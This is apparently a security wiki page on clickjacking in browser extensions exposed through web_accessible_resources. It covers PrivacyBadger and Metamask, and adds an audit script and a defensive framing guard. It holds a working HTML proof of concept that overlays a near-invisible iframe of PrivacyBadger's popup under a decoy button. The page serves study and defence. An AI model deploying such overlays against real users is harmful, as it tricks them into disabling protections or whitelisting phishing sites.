BrowExt - ClickJacking

Last updated 3 months ago

Basic Information

This page shows how to abuse a ClickJacking vulnerability in a browser extension. If you don't know what ClickJacking is, check the Clickjacking page first.

Extensions contain the file manifest.json, and that JSON file has a field web_accessible_resources. Here's what the Chrome docs say about it:

These resources would then be available in a webpage via the URL chrome-extension://[PACKAGE ID]/[PATH], which can be generated with the extension.getURL method. Allowlisted resources are served with appropriate CORS headers, so they're available via mechanisms like XHR.

The web_accessible_resources in a browser extension are not just accessible via the web; they also operate with the extension's inherent privileges. This means they have the capability to:

  • Change the extension's state

  • Load additional resources

  • Interact with the browser to a certain extent

However, this feature presents a security risk. If a resource within web_accessible_resources has any significant functionality, an attacker could embed this resource into an external web page. Unsuspecting users visiting this page might inadvertently activate this embedded resource, with consequences that depend on the permissions and capabilities of the extension's resources. Manifest V3 does not change this: each entry becomes an object with resources and matches lists, and a matches list such as ["<all_urls>"] lets any site embed the resource, so the same review applies.
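The check a practitioner wants before reasoning about this class of bug is a quick audit of which web-accessible resources are actually HTML pages, and from which origins they can be loaded. The following is an added example written for this page, not code from the original post or from any extension. It handles both the Manifest V2 form (an array of globs, reachable from any origin) and the Manifest V3 form (objects with resources and matches lists). The glob handling is a simplification (only * is special, and it also matches /), and the manifests and file list are constructed for the example; in practice, walk the unpacked extension directory.

```javascript
// Added example for this page (not code from the original post or from any
// extension): list the HTML files an extension exposes through
// web_accessible_resources, and from which origins they can be loaded.
// Handles MV2 (array of glob strings, reachable from every origin) and MV3
// (array of {resources, matches} objects).

// Simplified Chrome resource glob -> RegExp: only "*" is special and it also
// matches "/", so "skin/*" covers nested paths.
function globToRegExp(glob) {
  const escaped = glob
    .replace(/[.+?^${}()|[\]\\]/g, "\\$&")
    .replace(/\*/g, ".*");
  return new RegExp("^" + escaped + "$");
}

// Normalise MV2 and MV3 declarations into [{ pattern, matches }].
function normaliseWar(manifest) {
  const entries = [];
  for (const item of manifest.web_accessible_resources || []) {
    if (typeof item === "string") {
      // MV2: no origin restriction exists, so treat it as <all_urls>.
      entries.push({ pattern: item, matches: ["<all_urls>"] });
    } else if (item && Array.isArray(item.resources)) {
      const matches = item.matches || [];
      for (const pattern of item.resources) entries.push({ pattern, matches });
    }
  }
  return entries;
}

// A match pattern that lets every http(s) site embed the resource.
function isBroadMatch(pattern) {
  return pattern === "<all_urls>" || /^(\*|https?):\/\/\*\//.test(pattern);
}

// One record per exposed HTML file: which declarations exposed it, the
// allowed origin patterns, and whether any site can frame it.
function findFrameableHtml(manifest, files) {
  const byFile = new Map();
  for (const { pattern, matches } of normaliseWar(manifest)) {
    const re = globToRegExp(pattern);
    for (const file of files) {
      if (!file.endsWith(".html") || !re.test(file)) continue;
      const prev = byFile.get(file);
      if (prev) {
        prev.via.push(pattern);
        prev.matches = [...new Set([...prev.matches, ...matches])];
      } else {
        byFile.set(file, { file, via: [pattern], matches: [...matches] });
      }
    }
  }
  return [...byFile.values()].map((r) => ({
    ...r,
    anyOrigin: r.matches.some(isBroadMatch),
  }));
}

// Human-readable report lines for one manifest.
function report(label, manifest, files) {
  return findFrameableHtml(manifest, files).map((r) =>
    `${label}: ${r.file} (via ${r.via.join(", ")}) ` +
    (r.anyOrigin ? "frameable by ANY site" : `frameable by ${r.matches.join(" ")}`));
}

// Constructed sample data: the PrivacyBadger-style MV2 declaration from the
// page, an MV3 rewrite that narrows the popup to one origin, and a made-up
// file listing (skin/options.html is invented for the example).
const mv2Manifest = {
  manifest_version: 2,
  web_accessible_resources: ["skin/*", "icons/*"],
};
const mv3Manifest = {
  manifest_version: 3,
  web_accessible_resources: [
    { resources: ["icons/*"], matches: ["<all_urls>"] },
    { resources: ["skin/popup.html"], matches: ["https://example.com/*"] },
  ],
};
const sampleFiles = [
  "skin/popup.html",
  "skin/options.html",
  "skin/popup.css",
  "icons/badger.png",
  "js/background.js",
];

console.log(report("MV2", mv2Manifest, sampleFiles).join("\n"));
console.log(report("MV3", mv3Manifest, sampleFiles).join("\n"));
```

Every line the report prints is a page an arbitrary site can load into an iframe (or, for a narrowed MV3 entry, the sites listed in matches can). Each such page then needs the same question asked of it that the PrivacyBadger popup failed: does anything on it perform a privileged action on click?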

PrivacyBadger Example

In the extension PrivacyBadger, a vulnerability was identified related to the skin/ directory being declared in web_accessible_resources in the following manner (check the original blog post at https://blog.lizzie.io/clickjacking-privacy-badger.html):

```json
"web_accessible_resources": [
  "skin/*",
  "icons/*"
]
```

This configuration led to a security issue. Specifically, the skin/popup.html file, which is rendered when the user clicks the PrivacyBadger icon in the browser toolbar, could be embedded in an iframe by any web page. This embedding could be exploited to deceive users into clicking "Disable PrivacyBadger for this Website" without realising it. Such a click disables the PrivacyBadger protection for the attacker's site and exposes the user to increased tracking. A video of the exploit is available at https://blog.lizzie.io/clickjacking-privacy-badger/badger-fade.webm.

The fix was easy: remove skin/* from web_accessible_resources. After that change the content of the skin/ directory, popup.html included, can no longer be loaded by web pages, and therefore can no longer be framed. Only icons/* stays web-accessible, which is harmless for static images that carry no clickable functionality.

PoC

```html
<!--https://blog.lizzie.io/clickjacking-privacy-badger.html-->

<style>
  /* Nearly transparent iframe stacked over the decoy page: the user sees the
     decoy, but the click lands on the extension popup inside the frame. */
  iframe {
    width: 430px;
    height: 300px;
    opacity: 0.01;
    float: top;
    position: absolute;
  }

  #stuff {
    float: top;
    position: absolute;
  }

  /* Decoy button placed where the popup's "Disable PrivacyBadger for this
     Website" control is rendered inside the frame. */
  button {
    float: top;
    position: absolute;
    top: 168px;
    left: 100px;
  }
</style>

<div id="stuff">
  <h1>Click the button</h1>
  <button id="button">click me</button>
</div>

<!-- Only loads while skin/* is listed in web_accessible_resources. The ID is
     the one used in the original post; a Web Store install has a fixed ID,
     an unpacked install gets a different one. -->
<iframe
  src="chrome-extension://ablpimhddhnaldgkfbpafchflffallca/skin/popup.html">
</iframe>
```
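The PoC above works only because popup.html renders its controls even when it is not the top-level document. Removing the page from web_accessible_resources (the PrivacyBadger fix) is the primary defence; a page that must stay web-accessible should additionally refuse to act when it is framed, or when it was not loaded from the extension's own origin. The following guard is an added example, not code from the original page, PrivacyBadger or Metamask; the fakeWindow and fakeDocument stand-ins are constructed so the logic can be exercised outside a browser.

```javascript
// Added example, not code from the original page, PrivacyBadger or Metamask:
// a guard for a privileged extension page (for instance a popup.html that is
// still listed under web_accessible_resources). It refuses to enable the
// page's controls when the page is framed or is not served from the
// extension's own origin. `win` and `doc` are passed in instead of using the
// globals so the logic can be run outside a browser with stand-ins.

function framingStatus(win) {
  // A top-level document has win.top === win.self. Reading win.top is
  // permitted even when the embedding page is cross-origin, so this
  // comparison works inside an iframe on an attacker's site.
  const framed = win.top !== win.self;
  const proto = win.location.protocol;
  const ownOrigin = proto === "chrome-extension:" || proto === "moz-extension:";
  return { framed, ownOrigin, allow: !framed && ownOrigin };
}

// Disable every button and replace the body with a notice unless the check
// passes. Returns the decision so callers (and tests) can inspect it.
function guardPrivilegedUi(win, doc) {
  const status = framingStatus(win);
  if (!status.allow) {
    for (const button of doc.querySelectorAll("button")) {
      button.disabled = true;
    }
    doc.body.textContent = "This page cannot be used inside a frame.";
  }
  return status;
}

// Stand-in window/document objects (constructed for this example) so the
// guard can be run in Node. In the real extension page call
// guardPrivilegedUi(window, document) before attaching click handlers.
function fakeWindow({ framed, protocol }) {
  const self = { location: { protocol } };
  self.self = self;
  self.top = framed ? { location: {} } : self; // a foreign parent when framed
  return self;
}

function fakeDocument(buttonCount) {
  const buttons = Array.from({ length: buttonCount }, () => ({ disabled: false }));
  // querySelectorAll ignores its selector here; the stand-in only has buttons.
  return { body: { textContent: "" }, querySelectorAll: () => buttons, buttons };
}

// Demonstration: the same page loaded top-level and loaded inside a frame.
console.log(guardPrivilegedUi(fakeWindow({ framed: false, protocol: "chrome-extension:" }), fakeDocument(2)));
console.log(guardPrivilegedUi(fakeWindow({ framed: true, protocol: "chrome-extension:" }), fakeDocument(2)));
```

Two limits worth knowing: an attacker can stop the guard script from running with an iframe sandbox attribute, but that also stops the page's own click handlers, so the framed click achieves nothing; and the check does not help a page that performs its privileged action on load rather than on click, which only removing the page from web_accessible_resources fixes.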

Metamask Example

A blog post about a ClickJacking in Metamask can be found at https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9. In this case, Metamask fixed the vulnerability by checking that the protocol used to access the page was https: or http: (not chrome:, for example).

Another ClickJacking fixed in the Metamask extension was that users were able to click to whitelist a page that had been flagged as suspected phishing, because of "web_accessible_resources": ["inpage.js", "phishing.html"]. As that page was vulnerable to Clickjacking, an attacker could abuse it by showing something innocuous to make the victim click the whitelist button without noticing, and then going back to the phishing page, which would now be whitelisted.

Steam Inventory Helper Example

Check the following page to see how an XSS in a browser extension was chained with a ClickJacking vulnerability: BrowExt - XSS Example.

References
https://blog.lizzie.io/clickjacking-privacy-badger.html
https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9